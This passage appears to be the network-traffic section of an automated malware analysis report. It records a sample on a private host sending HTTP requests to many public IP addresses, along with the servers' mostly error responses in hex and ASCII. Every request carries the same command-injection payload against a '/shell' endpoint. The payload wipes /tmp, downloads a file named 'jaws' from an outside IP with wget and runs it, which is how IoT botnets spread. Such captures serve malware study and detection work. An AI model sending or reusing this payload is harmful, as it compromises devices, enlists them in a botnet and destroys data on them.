                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          608192.168.2.234171486.107.30.11580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.089931965 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.363141060 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          609192.168.2.235127488.151.101.14880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.254796982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.510946035 CET506INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Server: Apache/2.4.38 (Debian)
                                                          Content-Length: 312
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 65 62 6d 61 69 6c 2e 63 61 72 74 6f 73 6f 66 74 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at webmail.cartosoft.hu Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          610192.168.2.235582262.138.75.22980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.265496016 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.531460047 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          611192.168.2.234559018.140.253.6780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.354969978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.689347982 CET78INHTTP/1.1 400 BAD_REQUEST
                                                          Content-Length: 0
                                                          Connection: Close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          612192.168.2.2357188184.27.51.3280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.366173029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.711452007 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 32 62 64 65 66 37 35 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 35 26 23 34 36 3b 36 35 65 31 66 66 61 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;72bdef75&#46;1704173135&#46;65e1ffa2</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          613192.168.2.2355178104.252.147.12880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.867202044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:36.028285027 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          614192.168.2.2338682197.26.123.21580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:36.163558960 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          615192.168.2.234754223.57.78.17480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:36.406857967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:36.780858994 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:36 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:36 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 35 64 64 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 36 26 23 34 36 3b 33 37 39 38 30 32 31 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;765dd217&#46;1704173136&#46;3798021b</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          616192.168.2.2343926216.172.159.3680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:37.943407059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.104387999 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          617192.168.2.235753235.211.213.10780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:37.947175026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          618192.168.2.234870223.14.39.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:37.988872051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.195410967 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:38 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:38 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 61 33 31 33 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 38 26 23 34 36 3b 39 33 65 33 62 30 37 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;12a31302&#46;1704173138&#46;93e3b07f</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          619192.168.2.234881062.146.189.2880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:38.026985884 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.272485971 CET1162INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:24:52 GMT
                                                          Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g
                                                          Last-Modified: Tue, 14 Mar 2017 11:18:34 GMT
                                                          ETag: "3ca039-30b-54aaefd0ff680;48211bc79dac0"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 779
                                                          Vary: Accept-Encoding
                                                          Keep-Alive: timeout=15, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 69 73 70 43 50 20 4f 4d 45 47 41 20 2d 20 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 7a 68 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 21 3c 2f 68 32 3e 0a 09 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 61 74 68 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 67 65 74 5f 70 61 74 68 28 29 29 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 68 33 3e 5a 65 66 69 78 2e 2e 2e 21 20 4e 69 78 20 67 66 75 6e 64 6e 21 3c 2f 68 33 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>ispCP OMEGA - Error 404</title><meta name="robots" content="nofollow, noindex" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script src="/errors/inc/errordocs.js" type="text/javascript"></script><link href="/errors/inc/errordocs.css" rel="stylesheet" type="text/css" /></head><body><div id="zh"><div id="content"><h2>Error 404!</h2><br /><span class="path"><script type="text/javascript"> document.write(get_path()); </script></span><h3>Zefix...! Nix gfundn!</h3></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          620192.168.2.235683651.210.89.5380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:38.038523912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.294549942 CET506INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:38 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 312
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 69 70 35 39 2e 69 70 2d 35 31 2d 32 31 30 2d 38 39 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at ip59.ip-51-210-89.eu Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          621192.168.2.234831818.164.18.3380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:38.054989100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.328437090 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:25:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          622192.168.2.235865294.152.11.20880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:38.297923088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          623192.168.2.2341074154.12.30.8380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:38.407130003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.711067915 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                          Jan 2, 2024 06:25:38.965141058 CET13INData Raw: 3e
                                                          Data Ascii: >


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          624192.168.2.233288818.154.143.21780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:38.870167017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:39.020037889 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:25:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
